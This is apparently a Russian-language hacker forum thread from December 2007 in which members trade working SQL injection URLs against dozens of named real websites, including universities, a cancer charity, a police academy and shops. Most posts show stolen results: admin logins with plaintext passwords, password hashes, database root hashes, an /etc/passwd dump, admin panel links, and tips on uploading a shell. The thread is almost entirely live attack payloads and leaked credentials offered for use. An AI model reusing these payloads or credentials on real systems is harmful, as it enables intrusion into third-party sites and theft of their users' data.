http://www.arbicon.ru/news/?id=-1+or+1=(select+system_user)-- portal

159932

27.12.2007, 16:32

www.glukometr.ru
http://www.glukometr.ru/article.php?action=ViewArticle&ID=360+union+select+1,login,3,pass,5+from+users/*
5.0.45-community
login:admin
pass:123
де админка ненаю ((

NilsonUA

27.12.2007, 16:42

http://www.archivespro.ru/index.php?news=-18+union+select+1,2,concat(user(),0x3a,database(), 0x3a,version()),4,5,6,7,8,9,10,11,12/*

archive9_2@localhost:archive9_arhiv:4.1.22-log

Saint-Sky

27.12.2007, 16:50

2 159932

Посмотрел robots, по идее должна быть в /admin/, но там нету...

Попробуй таблицы от форума. (phpbb_users) - Если подберешь пасс, то можешь залить шелл...

http://www.glukometr.ru/article.php?action=ViewArticle&ID=360+UNION+SELECT+1,concat(username,0x3a,user_pa ssword),3,4,5+from+gurujen_forum.phpbb_users/*

Ольга:82e0839b64d121ef7154f2b8d5b27351:qween1

159932

27.12.2007, 17:25

от Saint-Sky
Если подберешь пасс, то можешь залить шелл...
да я то знаю ... просто префикс никак найти не мог .. ты нашёл - возьми с полки пирожок

159932

27.12.2007, 17:42

ultimate.com.ua
http://www.ultimate.com.ua/ru/?g=news&a=9500+union+select+1,2,3,username,5,user_password ,7+from+phpbb_users/*
Пятая
login:Стрелка
hesh:260a4f2ad2b1ae4ddf66f780172c6ce9
pass:ghjkbd

Ded MustD!e

27.12.2007, 17:54

www.netoncology.ru - Союз Противораковых Организаций России

Аж 4 таблицы с пользователями....
(вывод данных в первой строчке вверху)

Forum_Users:

http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,NikName,EMail,Pas s)+from+Forum_Users+limit+0,1/*

Users:

http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,UserLogin,UserPwd )+from+Users+limit+0,1/*

phpbb_patients_users:

http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,username,User_Pas sword)+from+phpbb_patients_users+limit+1,1/*

phpbb_specialists_users:

http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,username,User_Pas sword)+from+phpbb_specialists_users+limit+1,1/*

Все таблицы перебираем лимитом...

Админка:

http://netoncology.ru/admin/

login:admin
pass:ghbdtn

С наступающим=)

~EviL~

27.12.2007, 18:12

http://koleso.topof.ru/

http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,concat(ve rsion(),0x3a,database(),0x3a,user())/*
5.0.22:koleso_ktopof:koleso_ktopof@localhost

http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,table_nam e+FROM+information_schema.tables/*
http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,concat(ad min_id,0x3a,admin_name,0x3a,admin_password)+FROM+a dmins/*
http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,concat(us er_id,0x3a,username,0x3a,user_password,0x3a,user_e mail,0x3a,user_icq)+FROM+lotus_users/*

P.S. Лимит не нужен =)

Neovild

27.12.2007, 18:28

Издательство Дрофа!
http://www.drofa.ru/index_i.html?id_page=-1+union+select+1,concat(USER(),0x3a,VERSION(),0x3a ,DATABASE()),3,4,5,6,7,8,9,10,11,12/*
h_drofa_ru@localhost:4.1.22-log:drofa_ru

~EviL~

27.12.2007, 19:52

http://www.aiim.org/

http://www.aiim.org/standards.asp?id=1+or+1=(SELECT+TOP+1+cast(Email+a s+nvarchar)%2B%27%3A%27%2Bcast(PWD+as+nvarchar)+FR OM+vwWebUsers+WHERE+ID=10)--
dchapman@aiim.org:6520

С полученным добром заходим на:
http://www.aiim.org/login.asp

P.S. Прокручивайте ID =))

Ded MustD!e

27.12.2007, 21:50

http://www.segfl.org.uk/

http://www.segfl.org.uk/news/view.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user,passw ord),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47+from+mysql.user/*

ZAMUT

27.12.2007, 23:00

Английская букмекерская контора
www.online-betting-guide.co.uk
http://www.online-betting-guide.co.uk/tips/tipster.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user ,password),10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63,64,65,66,67,68,69,70+from+m ysql.user+limit+5,1+--+root:2bc39bf13f7a9949
http://www.online-betting-guide.co.uk/tips/tipster.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,unam e,password,balance,email),10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70+from+betting.ad_advertisers+limit+0,1+--+
разрешено чтение файлов

http://www.online-betting-guide.co.uk/tips/tipster.php?id=-1+union+select+1,2,3,4,5,6,7,8,load_file(0x2F65746 32F706173737764),10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+--+
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin proftpd:x:1002:103::/home:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash invendium:x:1003:1003::/home/backup:/bin/bash
www.tv-history.tv
http://www.tv-history.tv/preview.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,v ersion(),user(),database()),0x71),0x71),20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44+--+ 4.1.15-Debian_1ubuntu5:sqlsixnet@localhost:tv-history
Есть табличка admin

.Begemot.

27.12.2007, 23:27

renegadecommentaries.co.uk

http://www.renegadecommentaries.co.uk/commentary.php?movie=1+union+select+0,VERSION(),DA TABASE(),USER(),4,5/*

USER:renegade_khayman@localhost
VERSION:4.1.22-standard-log
DATABASE:renegade_maintest

Есть таблица users, поля id и password.
http://www.renegadecommentaries.co.uk/commentary.php?movie=1+union+select+0,1,2,concat(i d,0x3a,password),4,5+from+users/*

~EviL~

28.12.2007, 00:25

http://www.akulovagora.ru/

http://www.akulovagora.ru/page.php?pid=12'+and(1=2)+UNION+SELECT+1,2,concat( version(),0x3a,user(),0x3a,database()),4,5,6/*
4.1.21-log:sabra-alen@82.179.244.69:alukova

Ded MustD!e

28.12.2007, 02:12

http://moscowtoday.info/

http://moscowtoday.info/news.php?ID=-1'+union+select+concat_ws(0x3a,user(),database(),v ersion())/*

вывод данных в тайтле...

K1nD[e]R

28.12.2007, 07:10

http://www.myvideo.ge/cams/goLive.php?act=View&st_u_id=-24969+union+select+1,2,3,concat_ws(0x2F,user_id,us er_name,user_password),version(),6,7,8+from+video_ users/*

Version 5.0.22-log

user_name Password

Guro f5d1278e8109edd94e1e4197e04873b9
achiko 202cb962ac59075b964b07152d234b70

fRg

28.12.2007, 13:22

Год моей регистрации!

hcch.nethttp://www.hcch.net/index_en.php?act=conventions.text&cid=-1+union+select+aes_decrypt(aes_encrypt(concat_ws(0 x3a,version(),database(),user()),0x71),0x71),2,3,4/* 4.1.11-Debian_4sarge7-log:hcch:hcch@localhost

[ Логин : MySQL(pass) ] :root : 066bc62049564980

group.gehttp://www.group.ge/series.php?id_pro=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,ve rsion(),database(),user()),11,12,13/*5.0.22:grp:grp@localhost

PoliceAcademy.ge - Академия МВД Грузииhttp://www.policeacademy.ge/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16/* 5.0.22:academy:cube@localhost

Таблица authentification:id,username,password,survey_user, survey_pass,live_user,live_pass,level admin:studio0386

Таблица _forum_members :id,name,mgroup,legacy_password,email,joined,ip_ad dress,posts,title,allow_admin_mails,
time_offset,hide_email,email_pm,email_full,skin,wa rn_level,warn_lastwarn,language,
last_post,restrict_post,view_sigs,view_img,view_av s,view_pop,bday_day,bday_month,
bday_year,new_msg,msg_total,show_popup,misc,last_v isit,last_activity,dst_in_use,
view_prefs,coppa_user,mod_posts,auto_track,temp_ba n,sub_end,login_anonymous,
ignored_users,mgroup_others,org_perm_id,member_log in_key,subs_pkg_chosen,has_blog,
members_markers,members_editor_choice,members_auto _dst,members_display_name,
members_created_remote,members_cache,members_disab le_pm Есть таблица _forum_moderators

Ded MustD!e

28.12.2007, 15:25

http://www.blagotvori.com

http://www.blagotvori.com/programs.php?pid=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,pa sswd),8,9,10,11,12+from+admin/*

Админка:
http://www.blagotvori.com/admin/

login: nat_nadegdina
pass: nAtt756V12r

it's my

28.12.2007, 15:39

www.uprava.org - Сайт журнала посвященного вопросам местного самоуправления в России.
http://www.uprava.org/section.php?id=34+union+select+0,1,2,3,4,5,concat_ ws(0x2F,user())--

www.gaycentral.ru - Сайт Гей-Клуба "Три Обезьяны"
http://www.gaycentral.ru/news/?id=99999999+union+select+0,null,concat_ws(0x2F,us er(),version()),2,3,null,null,null,4,null,5--

AkyHa_MaTaTa

28.12.2007, 17:26

Первый эду который гугл выдает на "You have an error in your SQL syntax"(вывод в титле):
http://ipr1.hsc.usc.edu/php/wwwthreads5.4/showflat.php?Cat=-1'%20union%20select%20+concat(U_Name,char(59),U_Pa ssword)+FROM+w3t_Users+LIMIT%202,1/*

.Begemot.

28.12.2007, 17:41

kinopano.ru

http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,4,5,6,7,8,9,10/*

http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,concat(USER(),0x3a,VER SION(),0x3a,DATABASE()),5,6,7,8,9,10/*

USER:u24822@10.10.10.226
VERSION:5.0.45-log
DATABASE:u24822

Вывод названий всех таблиц -
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,table_name,5,6,7,8,9,1 0+from+information_schema.tables/*

Вывод названий всех колонн -
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,column_name,5,6,7,8,9, 10+from+information_schema.columns/*

Вывод id,name,passwd из таблици kino_users -
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,concat(id,0x3a,name,0x 3a,passwd),5,6,7,8,9,10+from+kino_users/*

Админка -
http://www.kinopano.ru/admin/

v1ru$

28.12.2007, 17:51

http://www.green-bay.tv/e_commitem.php?id=-31+union+select+1,2,3,4,concat(username,0x3a,passw ord),6,7,8,9,10,11,12,13+from+users/*

gbadmin:Rhondda

Ded MustD!e

28.12.2007, 18:58

http://www.awdf.org/

http://www.awdf.org/pages/?pid=2&sid=-1+union+select+concat_ws(0x3a,user,password),2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user/*

root:59b5b2b07b506bfa

Версия мускула пятая, так что можно перебирать все таблицы, у меня почему-то сайт начинает глючить при переборе....

http://www.awdf.org/pages/?pid=2&sid=-1+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17+from+information_schema.tables+lim it+0,1/*

http://www.akulovagora.ru/

http://www.akulovagora.ru/page.php?pid=-1'+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6/*

Loker

28.12.2007, 19:04

Фото студия))

http://www.2dstudio.ru/photo.php?id=-850+union+select+1,2,Version(),4/*

А вот еще их админка
http://www.2dstudio.ru/admin/

ThreeD

28.12.2007, 19:30

www.tensor-manpower.com

http://www.tensor-manpower.com/view-job.php?id=-229+uni0n+select+concat(password,0x3a,user)+from+m ysql.user+limit+0,1/*

3ba5ce1201df700e: admin
4537bc5250b6bf11: orders

ThreeD

28.12.2007, 21:11

www.downtowncrossing.org

http://www.downtowncrossing.org/shop/shop.php?id=-103+union+select+1,concat(version(),0x3a,user(),0x 3a,database()),3,4+from+members/*

4.1.20-standard :dca@beedrill.valueweb.net: dca

Названия полей подобрать неудалось.

Ded MustD!e

28.12.2007, 22:43

http://www.scripofilia.it/

http://www.scripofilia.it/product.asp?pid=1+or+1=(SELECT+TOP+1+cast(user_use rname+as+nva rchar)%2B%27%3A%27%2Bcast(user_PASSWORD+as+nvarcha r)+from+userS)--

http://www.dataplace.to/

http://www.dataplace.to/newhotel.asp?id=1+or+1=(SELECT+TOP+1+cast(logon_na me+as+nvarch ar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+ administrator+where+administrator_id=1)--

Nea7

28.12.2007, 22:49

есть member
для паса не нашёл

хацкеры. таблица - admin , колонки - username, password

ThreeD

28.12.2007, 23:17

www.ateme.com

http://www.ateme.com/career/job.php?id=-73+union+select+1,2,3,4,convert(concat(version(),0 x3a,user(),0x3a,database())+using+latin1),6,7,8,9, 10+from+user/*

4.1.11-Debian_4sarge7-log: atemeweb@localhost: atemeweb

Опять не подобрал поля. Таблицы admin нету ;) :D

Ded MustD!e

28.12.2007, 23:46

http://www.creditman.biz/ The UK's Leading Resource for Businesses and Credit Professionals

Админ этого сайта параноик, мало того, что он насоздавал с десяток фейковых таблиц содержащих название admin, колонки с логинами и паролями и т.д. Его логин и пароль состоят из 64 символов каждый!!! Хотя с другой стороны с финансами связано...

Вывожу по отдельности, так как вместе не помещается при выводе:

Логин: $uC&b+bAz&!#+e@6*cR5yaHec-utr?th7kustuz&ZuDrusp6mAweswAcre7Wu3Ab

http://www.creditman.biz/uk/members/news.asp?id=1+or+1=(SELECT+TOP+1+username+from+Adm inistration)--

Пароль: #r@kep*uX_th*b2xutRa52rey-paruna$ukeG5*Hep-phe9aj#swapeth7Phachu

http://www.creditman.biz/uk/members/news.asp?id=1+or+1=(SELECT+TOP+1+password+from+Adm inistration)--

Админка: https://www.creditman.biz/uk/admin/default.asp

Удачного взлома=)

NilsonUA

28.12.2007, 23:47

http://www.education.ex.ac.uk/dll/pages.php?id=-242+union+select+1,2,3,4,5,concat(user(),0x3a,data base(),0x3a,version()),7,8,9,10,11,12/*

sell@tuffet.ex.ac.uk:sell:4.1.20-log

а дальше непохек =\

ElteRUS

29.12.2007, 01:16

http://www.sopka.net/?pg=1&id=106106&owner=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*

4.0.27-max-log/tiba102/tiba102@v3.valuehost.ru

-----------------------------------------------------------------------------

http://www.probilliard.info/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,9,10,11/*

4.0.27-log/vh04971/vh04971@zvm7.host.ru

-----------------------------------------------------------------------------

http://www.restoclub.ru/news/?news_id=-1'+union+select+concat_ws(0x2F,version(),database( ),user())/*

5.0.45-log/u33748/u33748@10.10.223.204

http://www.restoclub.ru/news/?news_id=-1'+union+select+concat_ws(0x2F,login,password)+fro m+u33748_otelrent.b_users+limit+0,1/*

логин/хеш в title
root/be601c6844923ee53211c35603ff0b52

ThreeD

29.12.2007, 01:29

ну я думал что он их пробил ... раз до мемберс дошёл ... и проверять не стал ...
Блин, представляете, все перебрал, а про admin забыл :D
Бывает иногда...

n0ne

29.12.2007, 02:12

outertemple.com

http://www.outertemple.com/barristers.php?bid=-60+union+Select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,n ame,password),11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33+from+ot_users/*

otc1@truth-int.positive-internet.com::otc1::5.0.32-Debian_7etch1

ThreeD

29.12.2007, 04:23

www.firstfordrivers.co.uk

http://www.firstfordrivers.co.uk/job-seekers/view-job.php?id=-8+union+select+1,2,3,4,concat(username,0x3a,pass,0 x3a,id),6,7,8,9,10,11,12,13,14,15+from+users+limit +0,1/*

5.0.24-standard-log:firstfordrivers_co_uk:first4drivers@localhost

sherry:586e56fa6ed25d6392861a85bccb45e6f64f8e86:10

Лимитом выводим остальных.

Ded MustD!e

29.12.2007, 04:29

http://www.lunarenergy.co.uk/

http://www.lunarenergy.co.uk/newsDetail.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,convert(us ername+using+latin1),convert(password+using+latin1 )),7+from+admin/*

scadesign:scadoo

http://www.warrenpointharbour.co.uk/

http://www.warrenpointharbour.co.uk/general.php?id=-1+union+select+1,2,3,4,convert(version() +using+latin1),6,7,8,9,10,11/*

http://www.graysofwestminster.co.uk/

http://www.graysofwestminster.co.uk/newsitem.php?id=-1+union+select+1,convert(version()+usi ng+latin1),3,4,5,6/*

http://www.newrowfarmnurseries.co.uk/

http://www.newrowfarmnurseries.co.uk/show_item.php?id=-1'+union+select+1,2,concat_ws(0x3 a,user(),version(),database()),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17/*

http://www.inova.unicamp.br/

http://www.inova.unicamp.br/inovanosmunicipios/artigos_detail.php?id=-1+union+select+1,conca t_ws(0x3a,user(),version(),database()),3,4,5,6/*

Scipio

29.12.2007, 09:34

Какая то непонятная украинская CMS`ка FreshKnowledge

сайт CMS`ки:_http://www.freshknowledge.net/
сайт разработчика:_http://www.setlab.net/
уязвим форум, наверное там полно скулей, но копаться не стал, т.к. интереса особого не представляет

http://www.setlab.net/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*
еще примеры:
http://www.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*
http://youth.livinggod.org.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*

http://streetball.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*

Dr.Z3r0

29.12.2007, 12:19

Вот опять по edu прошолся, прошу любить и жаловать:

www.gatech.edu Georgia Institute of Technology
http://www.gatech.edu/calendar/event.php?id=-2210%20UNION%20SELECT%201,2,3,4,5,VERSION(),7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32/*5.0.37

www.history.msu.edu Department of History - Michigan State University
http://www.history.msu.edu/view_profile.php?id=-93%20UNION%20SELECT%201,2,AES_DECRYPT(AES_ENCRYPT( CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),0x 20),0x20),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31/*4.1.11-Debian_4sarge7-log : dpthistory2@www.matrix.msu.edu : dpthistory2

www.montana.edu Montana State University
http://www.montana.edu/cpa/news/nwview.php?article=-5458%20UNION%20SELECT%201,VERSION(),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*4.0.17

AkyHa_MaTaTa

29.12.2007, 14:03

вот еще одна едушка:
http://idl63.ils.unc.edu/chirag/Health/showmetadata.php?video_id=-1+union+select+1,2,3,4,5,6,7,8,9,database(),user() ,12,version(),14,15,16,17,18,19,20/*

SWAT

29.12.2007, 15:57

http://travel-tourthailand.com/hotel_detail.php?id=-1+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17+from+member/*

http://www.adventureincostarica.com/zones.php?ID=-1+union+select+1,VERSION(),3/*

ElteRUS

29.12.2007, 16:15

http://www.pyramid.spb.ru/content/news/default.asp?shmode=2&ids=1&ida=-1+or+1=@@version

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

--------------------------------------------------------------------------
http://www.rus7.org/index.php?p=news&newid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,versio n(),database(),user())/*

4.0.27-max-log/utsport1_db01/utsport1_db01@v29.valuehost.ru

--------------------------------------------------------------------------
http://www.combi-spb.ru/?module=news&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5/*

4.0.26/u63709/u63709@10.10.11.193

--------------------------------------------------------------------------
echoperm.ru

http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*&part_id=2&class=news

4.1.20-log/echotest/echotest@localhost

http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,username,user_pa ssword,user_email),4,5,6+from+phpbb_users/*&part_id=2&class=news

логин/хеш/мейл сразу все
admin/f609688322a2811966aeb9aca67e2557/gufar@inbox.ru

SWAT

29.12.2007, 17:29

http://www.silbersaiten.de/show_item.php?id=-111+union+select+1,2,concat(id,0x3a,name),4,5,6,7, 8,9+from+content/*

http://www.visitloudoncounty.com/show_item.php?id=-26+union+select+1,2/*

http://www.gregsequipment.com/show_item.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10+from+INFORMAT ION_SCHEMA.TABLES/*

https://www.happyvalleyamishtraders.com/store/show_item.php?id=-116+union+select+1,2,3,4,VERSION(),6,7,8,9,10,11,1 2,13,14/*

http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,10,11,12,conc at(username,0x3a,password),14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49+from+mob_users/*

S(r1pt

29.12.2007, 17:52

http://itsoft.ru/search/?search_query='&in_cat='
http://cs-server.ru/news/detail/?item_id='

v1ru$

29.12.2007, 17:58

http://mathinfo.montclair.edu/undergrad_research/profile.php?id=-48+union+select+1,concat(user(),0x3a,version(),dat abase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24/*

mathweb@localhost:4.0.18-standard-logmath

Mike 007

29.12.2007, 17:58

http://www.gangrule.com/gangs.php?ID=-1+union+select+user()/*
oldtapes_gangrul@localhost
4.1.22-standard-log
oldtapes_gangrulecom

http://www.fikb.it/news.asp?id=-1'
Errore SQL

Errore di run-time di Microsoft VBScript error '800a01a8'

Necessario oggetto: 'DBRecordSet(...)'
http://www.scamshield.com/Feature.asp?id=-1'

http://www.anchem.ru/catalog/dirCat.asp?id=-1'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_ID = -1'''.

/catalog/dirCat.asp, line 15

http://www.r66-rabota.ru/post.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41/*

http://www.socket2000.com/index.asp?id=-1'
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'category=-1' and active=true order by xdate desc'.

/includes/include_functions.asp, line 10

http://www.scamshield.com/Feature.asp?id=-1'
Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'ArticleNumber = -1''.

/Feature.asp, line 21

SWAT

29.12.2007, 18:05

http://ecodefense.ru/view.php?id=-503+union+select+1,2,3,4,5,6,7,8,9,VERSION(),11/*

http://www.hoglezoo.org/animals/view.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49/*

Mike 007

29.12.2007, 18:26

http://www.vikinggames.hu/product.php?id=-1+union+select+1,table_name,version(),4,user(),6,7 +from+information_schema.tables/*
5.0.32-Debian_7etch1-log
viking1@localhost

159932

29.12.2007, 19:08

http://www.prosambo.com/index.php?razdel=news&id=-51+union+select+1,2,3,4,5,6,7/*
5.0.45
----------------------------------------------------------------------
http://inforos.ru/?idth=-21+union+select+1/*
5.0.45-log
http://inforos.ru/?idth=-21+union+select+concat(login,0x3a,pass)+from+infor os_manager+limit+0,1/*
----------------------------------------------------------------------
http://www.infoshos.ru/?idn=9999+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0,1,2/*
5.0.45
----------------------------------------------------------------------
http://www.amur-trassa.ru/?id=-15+union+select+1,2,3,4,5,6,7,8/*
5.0.45
----------------------------------------------------------------------
http://www.abelmot.ru/?module=catalog&c_id=-2+union+select+1,2,table_name,4,5,6+from+informati on_schema.tables/*
5.0.45